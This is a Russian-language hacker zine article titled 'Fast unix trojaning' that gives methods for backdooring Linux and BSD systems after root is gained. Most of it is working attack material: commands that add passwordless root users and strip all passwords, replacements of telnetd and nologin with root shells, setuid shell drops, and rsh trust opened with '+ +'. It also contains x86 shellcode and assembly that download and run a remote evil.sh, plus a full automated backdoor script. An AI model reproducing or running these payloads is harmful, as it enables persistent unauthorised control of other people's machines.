-------------------------------------------------------------------------------- >>> Fast unix trojaning <<< -------------------------------------------------------------------------------- Идея в том чтобы затроянить машину с наименьшими затратами. А далее все, кому это нужно, могут перевести данные идеи в шеллкоды, etc.. Кое-что уже есть, т.к. эта тема не актуальна после выхода m00-modgzip.c. Может someday... ***> Linux <*** 1. Добавление пользователей # echo "m::0:0:666:/lib:/bin/sh" >> /etc/passwd # echo "s::968:0:3:/tmp:/bin/sh" >> /etc/passwd char shellcode[] = "\x31\xC0\x50\x68\x73\x73\x77\x64\x68\x63\x2F\x70\x61" "\x68\x2F\x2F\x65\x74\x89\xE3\x66\xB9\x01\x04\xB0\x05" "\xCD\x80\x89\xC3\x31\xC0\x50\x68\x2F\x73\x68\x0A\x68" "\x2F\x62\x69\x6E\x68\x74\x6D\x70\x3A\x68\x3A\x33\x3A" "\x2F\x68\x38\x36\x3A\x30\x68\x73\x3A\x3A\x39\x68\x2F" "\x73\x68\x0A\x68\x2F\x62\x69\x6E\x68\x6C\x69\x62\x3A" "\x68\x36\x36\x3A\x2F\x68\x3A\x30\x3A\x36\x68\x6D\x3A" "\x3A\x30\x89\xE1\xB2\x30\xB0\x04\xCD\x80\xB0\x06\xCD" "\x80\x31\xC0\x40\xCD\x80"; 2. Снятие всех паролей # cat /etc/passwd | sed -e "{ s/:x:/::/;}" > /etc/pass # mv -f /etc/pass /etc/passwd # cp /etc/password /etc/issue.net 3. Патчинг серверов # cat << _eof_ > /usr/sbin/in.telnetd > #!/bin/sh > /bin/sh -i > _eof_ # 4. 
Download с веба # wget some.host.org/evil.sh -q # chmod 755 evil.sh # ./evil.sh char downloadr_wget[] = "\x31\xC0\x50\x68\x2F\x75\x73\x72\x89\xE3\xB0\x0C\xCD" "\x80\x31\xC0\x50\x68\x2E\x61\x61\x61\x89\xE3\x6A\x41" "\x59\xB0\x05\xCD\x80\x31\xDB\x53\x68\x65\x78\x69\x74" "\x68\x2E\x2F\x6C\x0A\x68\x78\x20\x6C\x0A\x68\x6F\x64" "\x20\x2B\x68\x0A\x63\x68\x6D\x68\x6C\x20\x2D\x71\x68" "\x2E\x72\x75\x2f\x68\x61\x72\x6F\x64\x68\x33\x38\x2E" "\x6E\x68\x65\x74\x20\x66\x68\x68\x0A\x77\x67\x68\x69" "\x6E\x2F\x73\x68\x23\x21\x2F\x62\x89\xE1\x89\xC3\xB2" "\x34\xB0\x04\xCD\x80\xB0\x06\xCD\x80\x31\xC0\x50\x68" "\x2E\x61\x61\x61\x89\xE3\x66\xB9\xED\x01\xB0\x0F\xCD" "\x80\x31\xD2\x52\x68\x2E\x61\x61\x61\x89\xE3\x52\x53" "\x89\xE1\xB0\x0B\xCD\x80\x31\xC0\x40\xCD\x80"; # donwloadr via lynx 4 linux/x86 .globl _start _start: # chdir() = $12 xor %eax,%eax push %eax pushl $0x7273752f # "/usr" movl %esp,%ebx mov $12,%al int $0x80 # open() = $5 xor %eax,%eax push %eax pushl $0x6161612e # ".aaa" movl %esp,%ebx push $0101 pop %ecx mov $5,%al int $0x80 # write() = $4 movl %eax,%ebx xor %eax,%eax push %eax pushl $0x74697865 pushl $0x0a6c2f2e # "./l\n" pushl $0x0a6c2078 # "x l\n" pushl $0x2b20646f # "od +" pushl $0x6d68630a # "\nchm" pushl $0x6c3e2065 # "e >l" pushl $0x6372756f # "ourc" pushl $0x732d206c # "l -s" pushl $0x2f75722e # ".ru/" pushl $0x646f7261 # "arod" pushl $0x6e2e3338 # "83.n" pushl $0x6620786e # "nx f" pushl $0x796c0a68 # "h\nly" pushl $0x732f6e69 # "in/s" pushl $0x622f2123 # "#!/b" movl %esp,%ecx mov $60,%dl mov $4,%al int $0x80 # close() = $6 mov $6,%al int $0x80 # chmod() = $15 xor %eax,%eax push %eax pushl $0x6161612e movl %esp,%ebx movw $0755,%cx mov $15,%al int $0x80 # execve() = $11 xor %edx,%edx push %edx pushl $0x6161612e movl %esp,%ebx push %edx pushl %ebx movl %esp,%ecx mov $11,%al int $0x80 # exit() xor %eax,%eax incl %eax int $0x80 char downloadr_lynx[] = "\x31\xC0\x50\x68\x2F\x75\x73\x72\x89\xE3\xB0\x0C\xCD" "\x80\x31\xC0\x50\x68\x2E\x61\x61\x61\x89\xE3\x6A\x41" 
"\x59\xB0\x05\xCD\x80\x89\xC3\x31\xC0\x50\x68\x65\x78" "\x69\x74\x68\x2E\x2F\x6C\x0A\x68\x78\x20\x6C\x0A\x68" "\x6F\x64\x20\x2B\x68\x0A\x63\x68\x6D\x68\x65\x20\x3E" "\x6C\x68\x6F\x75\x72\x63\x68\x6C\x20\x2D\x73\x68\x2E" "\x72\x75\x2F\x68\x61\x72\x6F\x64\x68\x38\x33\x2E\x6E" "\x68\x6E\x78\x20\x66\x68\x68\x0A\x6C\x79\x68\x69\x6E" "\x2F\x73\x68\x23\x21\x2F\x62\x89\xE1\xB2\x3C\xB0\x04" "\xCD\x80\xB0\x06\xCD\x80\x31\xC0\x50\x68\x2E\x61\x61" "\x61\x89\xE3\x66\xB9\xED\x01\xB0\x0F\xCD\x80\x31\xD2" "\x52\x68\x2E\x61\x61\x61\x89\xE3\x52\x53\x89\xE1\xB0" "\x0B\xCD\x80\x31\xC0\x40\xCD\x80"; 5. Rsh rulezz # echo "+ +" > /root/.rhosts # rm -f /etc/hosts.deny # echo "ALL:ALL" > /etc/hosts.allow # echo "+ +" > /etc/hosts.equiv ***> *BSD <*** 1. Download с веба # links/lynx some.host.org/evil.sh -source > evil # chmod +x evil # ./evil # x86.s # download_via_lynx prog for freebsd x86 .globl _start _start: # chdir("/bin"); xor %eax,%eax push %eax pushl $0x6e69622f movl %esp,%ebx pushl %ebx pushl $12 push %eax int $0x80 # f=open("zyxa",O_CREAT|O_WRONLY,0755) xor %eax,%eax push %eax pushl $0x6178797a movl %esp,%ebx pushw $0x0755 pushw $0x0201 pushl %ebx pushl $5 push %eax int $0x80 # write(f, # "#!/b" "in/s" "h\nly" "nx -" "sour" "ce f" # "83.n" "arod" ".ru/" "b > " "b\nch" "mod " # "+x b" "\n./b" # ,52) movl %eax,%edx # store descriptor in %edx xor %eax,%eax push %eax pushl $0x622f2e0a pushl $0x6220782b pushl $0x20646f6d pushl $0x68630a62 pushl $0x203e2062 pushl $0x2f75722e pushl $0x646f7261 pushl $0x6e2e3338 pushl $0x66206563 pushl $0x72756f73 pushl $0x2d20786e pushl $0x796c0a68 pushl $0x732f6e69 pushl $0x622f2123 movl %esp,%ebx pushl $56 pushl %ebx pushl %edx pushl $4 push %eax int $0x80 xor %eax,%eax pushl %edx pushl $6 push %eax int $0x80 # execve("/bin/sh","/bin/sh\0zyxa\0",0) xor %eax,%eax push %eax pushl $0x68732f6e pushl $0x69622f2f movl %esp,%ebx push %eax pushl $0x6178797a movl %esp,%ecx push %eax pushl %ecx pushl %ebx movl %esp,%edx push %eax pushl %edx pushl %ebx pushl $59 
push %eax int $0x80 xor %eax,%eax push $1 push %eax int $0x80 char bsd_lynx_downloadr [] = "\x31\xC0\x50\x68\x2F\x62\x69\x6E\x89\xE3\x53\x6A\x0C" "\x50\xCD\x80\x31\xC0\x50\x68\x7A\x79\x78\x61\x89\xE3" "\x66\x68\x55\x07\x66\x68\x01\x02\x53\x6A\x05\x50\xCD" "\x80\x89\xC2\x31\xC0\x50\x68\x0A\x2E\x2F\x62\x68\x2B" "\x78\x20\x62\x68\x6D\x6F\x64\x20\x68\x62\x0A\x63\x68" "\x68\x62\x20\x3E\x20\x68\x2E\x72\x75\x2F\x68\x61\x72" "\x6F\x64\x68\x38\x33\x2E\x6E\x68\x63\x65\x20\x66\x68" "\x73\x6F\x75\x72\x68\x6E\x78\x20\x2D\x68\x68\x0A\x6C" "\x79\x68\x69\x6E\x2F\x73\x68\x23\x21\x2F\x62\x89\xE3" "\x6A\x38\x53\x52\x6A\x04\x50\xCD\x80\x31\xC0\x52\x6A" "\x06\x50\xCD\x80\x31\xC0\x50\x68\x6E\x2F\x73\x68\x68" "\x2F\x2F\x62\x69\x89\xE3\x50\x68\x7A\x79\x78\x61\x89" "\xE1\x50\x51\x53\x89\xE2\x50\x52\x53\x6A\x3B\x50\xCD" "\x80\x31\xC0\x6A\x01\x50\xCD\x80"; 2. Добавление пользователей # pw useradd o -w none # cp /bin/sh /tmp/.asshole # chmod 4755 /tmp/.asshole 3. Патчинг /sbin/nologin # cat << _eof_ > /sbin/nologin > #!/bin/sh > /bin/sh -i > _eof_ # chmod 4755 /sbin/nologin # cp /etc/passwd /etc/issue.net # sorry за оффтопик, но.. # # Ну чё, эти шеллкоды мы тоже сперли с секфока? Кто-то в форуме что-то на эту # тему орал... ах да, это два долбоёба: pupok и c0d3x. 
# Простой пример скрипта для скачивания evil.sh 4 linux: #!/bin/sh rm -f .aaa if [ "$EUID" != "0" ] then exit fi if [ -n "`netstat -a | grep LISTEN | grep telnet`" ] then X1="telnetd" fi if [ -z "$X1" ] then if [ -n "`netstat -a | grep LISTEN | grep finger`" ] then X1="fingerd" fi fi if [ -z "$X1" ] then if [ -n "`netstat -a | grep LISTEN | grep shell`" ] then X1="rshd" fi fi if [ -z "$X1" ] then if [ -n "`netstat -a | grep LISTEN | grep login`" ] then X1="rlogind" fi fi if [ -n "$X1" ] then Xf=`find /usr/sbin /sbin -name "*$X1"` if [ -n "$Xf" ] then cat << _eof_ > $Xf #!/bin/sh /tmp/.asa _eof_ cp /bin/sh /tmp/.asa chmod 4755 /tmp/.asa exit # XXX fi fi if [ -n "`ps -aux | grep xinetd`" ] then cat << _eof_ > /etc/xinetd.d/telnet service telnet { socket_type = stream wait = no user = root server = /usr/sbin/in.telnetd disabled = no } _eof_ cat << _eof_ > /usr/sbin/in.telnetd #!/bin/sh /bin/sh _eof_ chmod 755 /usr/sbin/in.telnetd kill -9 `ps -aux | grep xinetd | awk {'print $2'}` xinetd & INET="4" fi # if we g0t inetd... if [ -z "$INET" ] then if [ -e "/etc/inetd.conf" ] then echo "telnet stream tcp nowait root /usr/sbin/in.telnetd in.telnetd" >> /etc/inetd.conf cat << _eof_ > /usr/sbin/in.telnetd #!/bin/sh /bin/sh _eof_ chmod 755 /usr/sbin/in.telnetd kill -9 `ps -aux | grep inetd | awk {'print $2'}` inetd & fi fi cat /etc/passwd | sed -e "{s/:x:/::/;}" > /etc/pass mv /etc/pass /etc/passwd cat /etc/passwd /etc/issue.net rm -f l # _eof_ [ Prev Page | Goto Content | Next Page ]